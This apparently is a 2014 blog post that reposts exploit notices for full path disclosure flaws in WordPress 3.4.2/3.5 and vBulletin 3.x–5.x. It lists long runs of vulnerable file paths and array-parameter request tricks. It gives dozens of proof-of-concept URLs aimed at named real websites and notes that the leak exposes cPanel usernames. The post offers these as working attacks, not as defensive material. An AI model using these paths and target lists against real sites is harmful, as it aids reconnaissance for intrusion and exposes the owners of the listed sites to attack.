Thứ Sáu, 7 tháng 2, 2014

Path Disclosure


Wordpress <=3.4.2


The Full Path Disclosure is in Wordpress <= 3.4.2, with this information you can get the path to the site you're in and (in most of the cases) cpanel's user****. To see it go to:
 http://[path]/wp-includes/rss-functions.php 
 Examples: http://tsmp.us/wp-includes/rss-functions.php 
http://tafeio.com/wp-includes/rss-functions.php 
 http://santana1540.com.br/wp-includes/rss-functions.php
 It works in 90% of the sites


[+] vBulletin all 3 vBulletin full path disclosure Vulnerability
[-] Found by Angel Injection
[-] Version: all 3
[-] Security -::RISK: Just For Information So "Low"
[-] platforms: php
[-] http://1337day.com http://r00tw0rm.com http://i313.cc

[+] Thanx To "Mhd1"


Exploit work on

http://localhost/search.php?do[]=1337

http://localhost/profile.php?do[]=1337

http://localhost/subscription.php?do[]=1337

Online Test

http://www.victim.net/vb/search.php?do[]=lol.cc/313 And 1337day.com

http://www.victim.net/vb/profile.php?do[]=lol.cc/313 And 1337day.com

http://www.victim.net/vb/subscription.php?do[]=lol.cc/313 And 1337day.com


# 1337day.com [2012-07-02]










vBulletin 4.x5.x multiple Full Puth Disclosure Vuln 

/includes/api/commonwhitelist_2.php /includes/api/commonwhitelist_5.php /includes/api/commonwhitelist_6.php /includes/api/1/album_album.php /includes/api/1/album_editalbum.php /includes/api/1/album_latest.php /includes/api/1/album_overview.php /includes/api/1/album_picture.php /includes/api/1/album_user.php /includes/api/1/announcement_edit.php /includes/api/1/announcement_view.php /includes/api/1/api_cmscategorylist.php /includes/api/1/api_cmssectionlist.php /includes/api/1/api_forumlist.php /includes/api/1/api_getnewtop.php /includes/api/1/api_getsecuritytoken.php /includes/api/1/api_getsessionhash.php /includes/api/1/api_init.php /includes/api/1/api_mobilepublisher.php /includes/api/1/api_usersearch.php /includes/api/1/blog_blog.php /includes/api/1/blog_bloglist.php /includes/api/1/blog_comments.php /includes/api/1/blog_custompage.php /includes/api/1/blog_dosendtofriend.php /includes/api/1/blog_list.php /includes/api/1/blog_members.php /includes/api/1/blog_post_comment.php /includes/api/1/blog_post_editblog.php /includes/api/1/blog_post_editcomment.php /includes/api/1/blog_post_edittrackback.php /includes/api/1/blog_post_newblog.php /includes/api/1/blog_post_postcomment.php /includes/api/1/blog_post_updateblog.php /includes/api/1/blog_sendtofriend.php /includes/api/1/blog_subscription_entrylist.php /includes/api/1/blog_subscription_userlist.php /includes/api/1/blog_usercp_addcat.php /includes/api/1/blog_usercp_editcat.php /includes/api/1/blog_usercp_editoptions.php /includes/api/1/blog_usercp_editprofile.php /includes/api/1/blog_usercp_modifycat.php /includes/api/1/blog_usercp_updateprofile.php /includes/api/1/editpost_editpost.php /includes/api/1/editpost_updatepost.php /includes/api/1/forum.php /includes/api/1/forumdisplay.php /includes/api/1/inlinemod_domergeposts.php /includes/api/1/list.php /includes/api/1/login_lostpw.php /includes/api/1/member.php /includes/api/1/memberlist_search.php /includes/api/1/misc_showattachments.php /includes/api/1/misc_whoposted.php /includes/api/1/newreply_newreply.php /includes/api/1/newreply_postreply.php /includes/api/1/newthread_postthread.php /includes/api/1/newthread_newthread.php /includes/api/1/poll_newpoll.php /includes/api/1/poll_polledit.php /includes/api/1/poll_showresults.php /includes/api/1/private_editfolders.php /includes/api/1/private_insertpm.php /includes/api/1/private_messagelist.php /includes/api/1/private_newpm.php /includes/api/1/private_showpm.php /includes/api/1/private_trackpm.php /includes/api/1/profile_editattachments.php /includes/api/1/profile_editoptions.php /includes/api/1/profile_editprofile.php /includes/api/1/register_addmember.php /includes/api/1/register_checkdate.php /includes/api/1/search_process.php /includes/api/1/search_showresults.php /includes/api/1/showthread.php /includes/api/1/subscription_addsubscription.php /includes/api/1/subscription_editfolders.php /includes/api/1/subscription_viewsubscription.php /includes/api/1/threadtag_managetags.php /includes/api/2/album_picture.php /includes/api/2/api_blogcategorylist.php /includes/api/2/blog_blog.php /includes/api/2/blog_bloglist.php /includes/api/2/blog_list.php /includes/api/2/blog_subscription_entrylist.php /includes/api/2/blog_subscription_userlist.php /includes/api/2/blog_usercp_groups.php /includes/api/2/content.php /includes/api/2/editpost_editpost.php /includes/api/2/forumdisplay.php /includes/api/2/member.php /includes/api/2/newreply_newreply.php /includes/api/2/forum.php /includes/api/2/poll_newpoll.php /includes/api/2/poll_polledit.php /includes/api/2/poll_showresults.php /includes/api/2/private_messagelist.php /includes/api/2/private_trackpm.php /includes/api/2/profile_editattachments.php /includes/api/2/search_showresults.php /includes/api/2/showthread.php /includes/api/3/api_gotonewpost.php /includes/api/4/album_user.php /includes/api/4/api_forumlist.php /includes/api/4/api_getnewtop.php /includes/api/4/breadcrumbs_create.php /includes/api/4/facebook_getforumid.php /includes/api/4/facebook_getnewforummembers.php /includes/api/4/get_vbfromfacebook.php /includes/api/4/login_facebook.php /includes/api/4/newreply_postreply.php /includes/api/4/newthread_postthread.php /includes/api/4/register.php /includes/api/4/register_addmember.php /includes/api/4/search_findusers.php /includes/api/4/subscription_viewsubscription.php /includes/api/5/api_init.php /includes/api/6/api_getnewtop.php /includes/api/6/api_gotonewpost.php /includes/api/6/content.php /includes/api/6/member.php /includes/api/6/newthread_newthread.php /includes/block/blogentries.php /includes/block/cmsarticles.php /includes/block/html.php /includes/block/newposts.php /includes/block/sgdiscussions.php /includes/block/tagcloud.php /includes/block/threads.php /forumrunner/include/subscriptions.php /forumrunner/include/search_forum.php /forumrunner/include/profile.php /forumrunner/include/post.php /forumrunner/include/pms.php /forumrunner/include/online.php /forumrunner/include/moderation.php /forumrunner/include/misc.php /forumrunner/include/login.php /forumrunner/include/get_thread.php /forumrunner/include/get_forum.php /forumrunner/include/cms.php /forumrunner/include/attach.php /forumrunner/include/announcement.php /forumrunner/include/album.php /forumrunner/support/vbulletin_methods.php /forumrunner/support/stringparser_bbcode.class.php /forumrunner/support/utils.php /forumrunner/support/other_methods.php /packages/skimlinks/hooks/postbit_display_complete.php /packages/skimlinks/hooks/showthread_complete.php /packages/skimlinks/hooks/userdata_start.php





The Full Path Disclosure is vBulletin 4.2.0,

 in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's user.. To see it go to: http://[path]/forumrunner/include/album.php It works in 90% of the forums. 
 Example: 




http://www.mgcproducts.com/forumrunner/include/album.php http://atheistdiscussion.com/forumrunner/include/album.php http://apolyton.net/forumrunner/include/album.php http://www.romaniancommunity.net/forumrunner/include/album.php http://www.ghosthax.com/forumrunner/include/album.php http://www.reddotcity.net/forumrunner/include/album.php http://www.sevenskins.com/forum/forumrunner/include/album.php http://www.purevb.com/forumrunner/include/album.php http://forum.hackersbrasil.com.br/forumrunner/include/album.php




# Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities
 # Date: [12.12.12] # Author: [Cyb3rboy] # Vendor or Software Link: [wordpress.org] 
 # Version: [wordpress 3.5] 
 # Category:: [***apps] 
 # Google dork: [use brain ]
 # Tested on: [windows] the following directories is vulnerable to path disclosure vulnerability in word-press 3.5



/wp-settings.php
POC :- http://sqayasia.com/wp-settings.php
http://www.way2blogging.org/wp-settings.php

/wp-includes/admin-bar.php
POC:- http://sqayasia.com/wp-includes/admin-bar.php
http://www.way2blogging.org/wp-includes/admin-bar.php


/wp-includes/author-template.php
Poc:- http://sqayasia.com/wp-includes/author-template.php
http://www.way2blogging.org/wp-includes/author-template.php

/wp-includes/canonical.php
Poc:- http://sqayasia.com/wp-includes/canonical.php

/wp-includes/category-template.php
Poc:- http://sqayasia.com/wp-includes/category-template.php
http://www.way2blogging.org/wp-includes/category-template.php

/wp-includes/class-wp-embed.php
Poc:- http://sqayasia.com/wp-includes/class-wp-embed.php
http://www.way2blogging.org

/wp-includes/media.php
POc:- http://sqayasia.com/wp-includes/media.php

/wp-includes/ms-default-constants.php
Poc :- http://sqayasia.com/wp-includes/ms-default-constants.php
http://www.way2blogging.org

/wp-includes/ms-default-filters.php
Poc:- http://sqayasia.com/wp-includes/ms-default-filters.php
http://www.way2blogging.org

/wp-includes/ms-settings.php
Poc:- http://sqayasia.com/wp-includes/ms-settings.php
http://www.way2blogging.org

/wp-includes/post.php
Poc:- http://sqayasia.com/wp-includes/post.php
http://www.way2blogging.org

/wp-includes/rss.php
Poc:- http://sqayasia.com/wp-includes/rss.php
http://www.way2blogging.org/wp-includes/rss.php

/wp-includes/user.php
Poc:- http://sqayasia.com/wp-includes/user.php
http://www.way2blogging.org/wp-includes/user.php

/wp-includes/theme.php
Poc:- http://sqayasia.com/wp-includes/theme.php
http://www.way2blogging.org/wp-includes/theme.php

/wp-includes/vars.php
Poc:- http://sqayasia.com/wp-includes/vars.php
http://www.way2blogging.org/wp-includes/vars.php

/wp-includes/class-wp-http-ixr-client.php
Poc:- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php

/wp-includes/class-wp-image-editor-gd.php
Poc:- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php

/wp-includes/class-wp-image-editor-imagick.php
Poc:- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php

/wp-includes/class-wp-xmlrpc-server.php
Poc:- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php

/wp-includes/class.wp-scripts.php
Poc:- http://sqayasia.com/wp-includes/class.wp-scripts.php
http://www.way2blogging.org/wp-includes/class.wp-scripts.php

/wp-includes/class.wp-styles.php
Poc:- http://sqayasia.com/wp-includes/class.wp-styles.php
http://www.way2blogging.org/wp-includes/class.wp-styles.php

/wp-includes/comment-template.php
Poc:- http://sqayasia.com/wp-includes/comment-template.php
http://www.way2blogging.org/wp-includes/comment-template.php

/wp-includes/default-filters.php
Poc:- http://sqayasia.com/wp-includes/default-filters.php
http://www.way2blogging.org/wp-includes/default-filters.php

/wp-includes/default-widgets.php
Poc:- http://sqayasia.com/wp-includes/default-widgets.php
http://www.way2blogging.org/wp-includes/default-widgets.php

/wp-includes/feed-atom-comments.php
Poc:- http://sqayasia.com/wp-includes/feed-atom-comments.php
http://www.way2blogging.org/wp-includes/feed-atom-comments.php

/wp-includes/feed-atom.php
Poc:- http://sqayasia.com/wp-includes/feed-atom.php
http://www.way2blogging.org/wp-includes/feed-atom.php

/wp-includes/feed-rdf.php
Poc:-http://sqayasia.com/wp-includes/feed-rdf.php
http://www.way2blogging.org/wp-includes/feed-rdf.php

/wp-includes/feed-rss.php
Poc:-http://sqayasia.com/wp-includes/feed-rss.php
http://www.way2blogging.org/wp-includes/feed-rss.php

/wp-includes/feed-rss2-comments.php
Poc:- http://sqayasia.com/wp-includes/feed-rss2-comments.php
http://www.way2blogging.org/wp-includes/feed-rss2-comments.php

/wp-includes/feed-rss2.php
Poc:- http://sqayasia.com/wp-includes/feed-rss2.php
http://www.way2blogging.org/wp-includes/feed-rss2.php

/wp-includes/functions.php
Poc:- http://sqayasia.com/wp-includes/functions.php
http://www.way2blogging.org/wp-includes/functions.php

Không có nhận xét nào:

Đăng nhận xét